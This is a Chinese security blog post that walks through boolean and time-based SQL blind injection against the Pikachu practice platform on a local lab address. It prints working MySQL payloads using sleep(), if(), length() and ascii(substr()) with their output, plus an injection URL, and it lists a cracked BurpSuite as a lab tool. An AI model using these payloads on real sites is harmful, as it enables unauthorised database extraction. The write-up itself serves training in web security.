<!DOCTYPE html>












  


<html class="theme-next mist use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">












  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.2.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.2.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.2.0" color="#222">






<link rel="stylesheet" href="/css/main.css?v=7.2.0">






<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


  
  
  <link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '7.2.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    search: {
      root: '/',
      path: 'search.xml'
    },
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    }
  };
</script>

  <meta name="description" content="一、实验环境 Pikachu漏洞联系平台 （Windows+Phpstudy环境） 火狐浏览器（附带插件HackBar与FoxyProxy） BurpSuite_Pro v1.7.26 破解版 漏洞平台地址为：http://192.168.31.193/pika  二、漏洞概述盲注是指数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或数据库执行延时等方法获取想要的信息。在一下几种情况">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL盲注注入">
<meta property="og:url" content="http://yoursite.com/2019/07/30/SQL注入-盲注/index.html">
<meta property="og:site_name" content="OldSix-Sec">
<meta property="og:description" content="一、实验环境 Pikachu漏洞联系平台 （Windows+Phpstudy环境） 火狐浏览器（附带插件HackBar与FoxyProxy） BurpSuite_Pro v1.7.26 破解版 漏洞平台地址为：http://192.168.31.193/pika  二、漏洞概述盲注是指数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或数据库执行延时等方法获取想要的信息。在一下几种情况">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-1.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-2.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-3.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-4.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-5.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-6.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-7.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-8.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-9.png">
<meta property="og:image" content="http://yoursite.com/images/SQL-Inject/5-10.png">
<meta property="og:updated_time" content="2019-08-03T09:25:59.627Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL盲注注入">
<meta name="twitter:description" content="一、实验环境 Pikachu漏洞联系平台 （Windows+Phpstudy环境） 火狐浏览器（附带插件HackBar与FoxyProxy） BurpSuite_Pro v1.7.26 破解版 漏洞平台地址为：http://192.168.31.193/pika  二、漏洞概述盲注是指数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或数据库执行延时等方法获取想要的信息。在一下几种情况">
<meta name="twitter:image" content="http://yoursite.com/images/SQL-Inject/5-1.png">





  
  
  <link rel="canonical" href="http://yoursite.com/2019/07/30/SQL注入-盲注/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  
  <title>SQL盲注注入 | OldSix-Sec</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">OldSix-Sec</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          <a href="javascript:;" class="popup-trigger">
          
            <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/30/SQL注入-盲注/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shu Shen">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/timg.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="OldSix-Sec">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL盲注注入

              
            
          </h1>
        

        <div class="post-meta">

          
          
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-07-30 17:49:53" itemprop="dateCreated datePublished" datetime="2019-07-30T17:49:53+08:00">2019-07-30</time>
            </span>
          

          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-08-03 17:25:59" itemprop="dateModified" datetime="2019-08-03T17:25:59+08:00">2019-08-03</time>
              </span>
            
          

          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/WEB安全/" itemprop="url" rel="index"><span itemprop="name">WEB安全</span></a></span>

                
                
                  ，
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/WEB安全/PHP/" itemprop="url" rel="index"><span itemprop="name">PHP</span></a></span>

                
                
              
            </span>
          

          
          

          

          

          <br>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <a id="more"></a>
<h2 id="一、实验环境"><a href="#一、实验环境" class="headerlink" title="一、实验环境"></a>一、实验环境</h2><ul>
<li>Pikachu漏洞联系平台 （Windows+Phpstudy环境）</li>
<li>火狐浏览器（附带插件HackBar与FoxyProxy）</li>
<li>BurpSuite_Pro v1.7.26 破解版</li>
<li>漏洞平台地址为：<a href="http://192.168.31.193/pika" target="_blank" rel="noopener">http://192.168.31.193/pika</a></li>
</ul>
<h2 id="二、漏洞概述"><a href="#二、漏洞概述" class="headerlink" title="二、漏洞概述"></a>二、漏洞概述</h2><p>盲注是指数据库查询结果无法从直观页面中获取，攻击者通过使用数据库逻辑或数据库执行延时等方法获取想要的信息。<br>在一下几种情况中可能需要用到盲注手段：</p>
<ul>
<li>部分网站没有输出显示，只能通过延时判断</li>
<li>不管正确或者错误的输入，都只显示两种情况</li>
<li>部分网站没办法 union select 联合查询方式注入</li>
</ul>
<ol>
<li>布尔盲注<br>布尔盲注利用MySQL条件不成立时返回空内容，条件成立时返回正常数据的特点来进行攻击。比如MySQL中有一个substr函数，他可以截取M有SQL内部返回值与某一字符进行比较，通过遍历比较就可以还原出攻击者想得到的结果。</li>
<li>时间盲注<br>同理，时间盲注通过substr截取字段返回信息的字符，通过一个个字符推算出最终的数据。和布尔盲注不同的是，时间盲注不是依据页面是否返回空内容来判断是否成立而是根据响应时间来判断。如果条件成立，页面就会比平时的响应速度更慢。</li>
</ol>
<h2 id="三、SQL语句原理"><a href="#三、SQL语句原理" class="headerlink" title="三、SQL语句原理"></a>三、SQL语句原理</h2><ol>
<li><p>检测延时注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select id,username from member where id=&apos;1&apos;union select 1,sleep(10);</span><br><span class="line">+----+----------+	</span><br><span class="line">| id | username |</span><br><span class="line">+----+----------+</span><br><span class="line">|  1 | vince    |</span><br><span class="line">|  1 | 0        |</span><br><span class="line">+----+----------+</span><br><span class="line">2 rows in set (10.00 sec)</span><br></pre></td></tr></table></figure>
</li>
<li><p>猜测数据库长度</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select database()</span><br><span class="line">    -&gt; ;</span><br><span class="line">+------------+</span><br><span class="line">| database() |</span><br><span class="line">+------------+</span><br><span class="line">| pikachu    |</span><br><span class="line">+------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select id,username from member where id=&apos;1&apos;union select 2,sleep(if((length(database())=7),10,0));</span><br><span class="line">+----+----------+</span><br><span class="line">| id | username |</span><br><span class="line">+----+----------+</span><br><span class="line">|  1 | vince    |</span><br><span class="line">|  2 | 0        |</span><br><span class="line">+----+----------+</span><br><span class="line">2 rows in set (10.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select id,username from member where id=&apos;1&apos;union select 2,sleep(if((length(database())=6),10,0));</span><br><span class="line">+----+----------+</span><br><span class="line">| id | username |</span><br><span class="line">+----+----------+</span><br><span class="line">|  1 | vince    |</span><br><span class="line">|  2 | 0        |</span><br><span class="line">+----+----------+</span><br><span class="line">2 rows in set (0.00 sec)</span><br></pre></td></tr></table></figure>

<p> if(条件,a,b)//若条件为TRUE则返回a,若条件为FALSE则返回b<br> length(database()); //返回当前数据库名的长度</p>
</li>
<li><p>猜测数据库名称</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select ascii(substr(database(),1,1));</span><br><span class="line">+-------------------------------+</span><br><span class="line">| ascii(substr(database(),1,1)) |</span><br><span class="line">+-------------------------------+</span><br><span class="line">|                           112 |</span><br><span class="line">+-------------------------------+</span><br><span class="line">1 row in set (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; select id,username from member where id=&apos;i&apos; union select 1,if((ascii(substr(database(),1,1))=112),sleep(10),NULL);</span><br><span class="line">+----+----------+</span><br><span class="line">| id | username |</span><br><span class="line">+----+----------+</span><br><span class="line">|  1 | 0        |</span><br><span class="line">+----+----------+</span><br><span class="line">1 row in set (10.00 sec)</span><br></pre></td></tr></table></figure>

<p> substr(string,start,length)</p>
<pre><code>string:必选，被截取的字段
start:当该参数为正数时从字符串指定位置开始截取
      当该参数为负数时从字符串结尾指定位置开始截取
length:需要截取的长度，缺省，即截取到结束位置。 </code></pre><p> ascii(str) 返回字符串最左边的字符的ascii码</p>
</li>
</ol>
<h2 id="四、布尔盲注实例"><a href="#四、布尔盲注实例" class="headerlink" title="四、布尔盲注实例"></a>四、布尔盲注实例</h2><ol>
<li>观察网页正常回显<br><img src="/images/SQL-Inject/5-1.png" alt="图5-1"></li>
<li>在name=kobe后面加上一个“ &#39; ”，然后观察页面回显<br><img src="/images/SQL-Inject/5-2.png" alt="图5-2"></li>
<li>出现这种情况就可能存在注入点，为确保准确性，猜测该位置的SQL查询语句就是用“ &#39; ”，进行闭合。<br>修改URL为<a href="http://192.168.31.193/pika/vul/sqli/sqli_blind_b.php?name=kobe%27+--+&amp;submit=查询#" target="_blank" rel="noopener">http://192.168.31.193/pika/vul/sqli/sqli_blind_b.php?name=kobe%27+--+&amp;submit=查询#</a><br><img src="/images/SQL-Inject/5-3.png" alt="图5-3"></li>
<li>成功返回正常的页面，现在可以100%确定该网页存在注入漏洞，下面就可以进一步进行渗透<br><img src="/images/SQL-Inject/5-4.png" alt="图5-4"></li>
</ol>
<h2 id="五、时间盲注检测"><a href="#五、时间盲注检测" class="headerlink" title="五、时间盲注检测"></a>五、时间盲注检测</h2><ol>
<li>观察网页页面回显，发现无论提交什么参数都是相同的回显<br><img src="/images/SQL-Inject/5-5.png" alt="图5-5"></li>
<li>构造延时查询的SQL语句进行注入<br><img src="/images/SQL-Inject/5-6.png" alt="图5-6"></li>
<li>通过图5-7，可以说明该网站在返回请求时延时了10秒<br><img src="/images/SQL-Inject/5-7.png" alt="图5-7"></li>
<li>猜测数据库名称长度<br>在判断数据库名称为7时延时了10秒，证明当前数据库名称长度为7<br><img src="/images/SQL-Inject/5-8.png" alt="图5-8"></li>
<li>猜测数据库名称中第一位字符<br>体现在网页中就是当你猜中了数据库名的第1位，网页加载时间变长为10s；<br><img src="/images/SQL-Inject/5-9.png" alt="图5-9"><br>ascii 112=p<br><img src="/images/SQL-Inject/5-10.png" alt="图5-10"></li>
</ol>

      
    </div>

    

    
      
    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        
          
        
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/28/SQL宽字节注入/" rel="next" title="SQL宽字节注入">
                <i class="fa fa-chevron-left"></i> SQL宽字节注入
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/01/SQL盲注注入进阶/" rel="prev" title="SQL盲注进阶——BurpSuite">
                SQL盲注进阶——BurpSuite <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  </div>


          </div>
          
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">

          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  
    <img class="site-author-image" itemprop="image" src="/images/timg.jpg" alt="Shu Shen">
  
  <p class="site-author-name" itemprop="name">Shu Shen</p>
  <div class="site-description motion-element" itemprop="description"></div>
</div>


  <nav class="site-state motion-element">
    
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        
        
          
        
          
        
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    

    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        
        
          
        
          
        
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>













          
          
        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、实验环境"><span class="nav-number">1.</span> <span class="nav-text">一、实验环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、漏洞概述"><span class="nav-number">2.</span> <span class="nav-text">二、漏洞概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、SQL语句原理"><span class="nav-number">3.</span> <span class="nav-text">三、SQL语句原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、布尔盲注实例"><span class="nav-number">4.</span> <span class="nav-text">四、布尔盲注实例</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、时间盲注检测"><span class="nav-number">5.</span> <span class="nav-text">五、时间盲注检测</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shu Shen</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v7.2.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
      <div id="needsharebutton-float">
        <span class="btn">
          <i class="fa fa-share-alt" aria-hidden="true"></i>
        </span>
      </div>
    

    
  
  
  <script src="/lib/needsharebutton/needsharebutton.js"></script>
  <script>
    
    
      flOptions = {};
      
        flOptions.iconStyle = "box";
      
        flOptions.boxForm = "horizontal";
      
        flOptions.position = "middleRight";
      
        flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
      
      new needShareButton('#needsharebutton-float', flOptions);
    
  </script>


    

  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
















  
  









  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>




  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.2.0"></script>




  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  <script src="/js/next-boot.js?v=7.2.0"></script>

  

  

  


  













  <script src="/js/local-search.js?v=7.2.0"></script>












<script>
// GET RESPONSIVE HEIGHT PASSED FROM IFRAME

window.addEventListener("message", function(e) {
  var data = e.data;
  if ((typeof data === 'string') && (data.indexOf('ciu_embed') > -1)) {
    var featureID = data.split(':')[1];
    var height = data.split(':')[2];
    $(`iframe[data-feature=${featureID}]`).height(parseInt(height) + 30);
  }
}, false);
</script>








  

</body>
</html>
